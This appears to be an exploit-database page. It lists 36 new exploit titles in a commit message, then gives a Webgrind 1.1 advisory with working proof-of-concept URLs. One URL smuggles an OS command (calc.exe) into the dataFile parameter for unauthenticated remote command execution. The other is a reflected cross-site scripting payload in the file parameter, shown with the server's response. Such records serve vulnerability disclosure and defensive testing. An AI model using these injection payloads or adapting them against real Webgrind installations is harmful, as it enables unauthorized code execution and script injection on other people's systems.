b137003172
36 changes to exploits/shellcodes/ghdb MiniDVBLinux 5.4 - Change Root Password MiniDVBLinux 5.4 - Remote Root Command Injection MiniDVBLinux 5.4 - Arbitrary File Read MiniDVBLinux 5.4 - Unauthenticated Stream Disclosure MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP - Remote Code Execution (RCE) MiniDVBLinux <=5.4 - Config Download Exploit Desktop Central 9.1.0 - Multiple Vulnerabilities FortiOS_ FortiProxy_ FortiSwitchManager v7.2.1 - Authentication Bypass Aero CMS v0.0.1 - PHP Code Injection (auth) Aero CMS v0.0.1 - SQL Injection (no auth) Atom CMS v2.0 - SQL Injection (no auth) Canteen-Management v1.0 - SQL Injection Canteen-Management v1.0 - XSS-Reflected Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS) eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE) FlatCore CMS 2.1.1 - Stored Cross-Site Scripting (XSS) Webgrind 1.1 - Reflected Cross-Site Scripting (XSS) & Remote Command Execution (RCE) WebTareas 2.4 - RCE (Authorized) WebTareas 2.4 - Reflected XSS (Unauthorised) WebTareas 2.4 - SQL Injection (Unauthorised) WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities Zentao Project Management System 17.0 - Authenticated Remote Code Execution (RCE) Zoneminder < v1.37.24 - Log Injection & Stored XSS & CSRF Bypass Grafana <=6.2.4 - HTML Injection Hex Workshop v6.7 - Buffer overflow DoS Scdbg 1.0 - Buffer overflow DoS Sysax Multi Server 6.95 - 'Password' Denial of Service (PoC) AVS Audio Converter 10.3 - Stack Overflow (SEH) Explorer32++ v1.3.5.531 - Buffer overflow Frhed (Free hex editor) v1.6.0 - Buffer overflow Gestionale Open 12.00.00 - 'DB_GO_80' Unquoted Service Path Mediconta 3.7.27 - 'servermedicontservice' Unquoted Service Path Resource Hacker v3.6.0.92 - Buffer overflow Tftpd32_SE 4.60 - 'Tftpd32_svc' Unquoted Service Path WiFi Mouse 1.8.3.2 - Remote Code Execution (RCE)
45 lines
No EOL
1.5 KiB
Text
45 lines
No EOL
1.5 KiB
Text
# Exploit Title: Webgrind 1.1 - Reflected Cross-Site Scripting (XSS) & Remote Command Execution (RCE)
|
|
# Discovery by: Rafael Pedrero
|
|
# Discovery Date: 2022-02-13
|
|
# Vendor Homepage: http://github.com/jokkedk/webgrind/
|
|
# Software Link : http://github.com/jokkedk/webgrind/
|
|
# Tested Version: 1.1
|
|
# Tested on: Windows 10 using XAMPP
|
|
|
|
# Vulnerability Type: Remote Command Execution (RCE)
|
|
|
|
CVSS v3: 9.8
|
|
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
CWE: CWE-434
|
|
|
|
Vulnerability description: Remote Command Execution (RCE) vulnerability in Webgrind <= 1.1 allow remote unauthenticated attackers to inject OS commands via /<webgrind_path_directory>/index.php in dataFile parameter.
|
|
|
|
Proof of concept:
|
|
|
|
http://localhost/tools/webgrind/index.php?dataFile=0%27%26calc.exe%26%27&showFraction=0.9&op=function_graph
|
|
|
|
And the calc.exe opens.
|
|
|
|
Note: 0'&calc.exe&', & char is neccesary to execute the command.
|
|
|
|
|
|
# Vulnerability Type: reflected Cross-Site Scripting (XSS)
|
|
|
|
CVSS v3: 6.5
|
|
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
CWE: CWE-79
|
|
|
|
Vulnerability description: Webgrind v1.1 and before, does not sufficiently
|
|
encode user-controlled inputs, resulting in a reflected Cross-Site
|
|
Scripting (XSS) vulnerability via the /<webgrind_path_directory>/index.php,
|
|
in file parameter.
|
|
|
|
Proof of concept:
|
|
|
|
http://localhost/webgrind/index.php?op=fileviewer&file=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctitle%3E
|
|
|
|
Response:
|
|
...
|
|
<title>
|
|
webgrind - fileviewer: </title><script>alert(1);</script><title> </title>
|
|
<script type="text/javascript" charset="utf-8"> |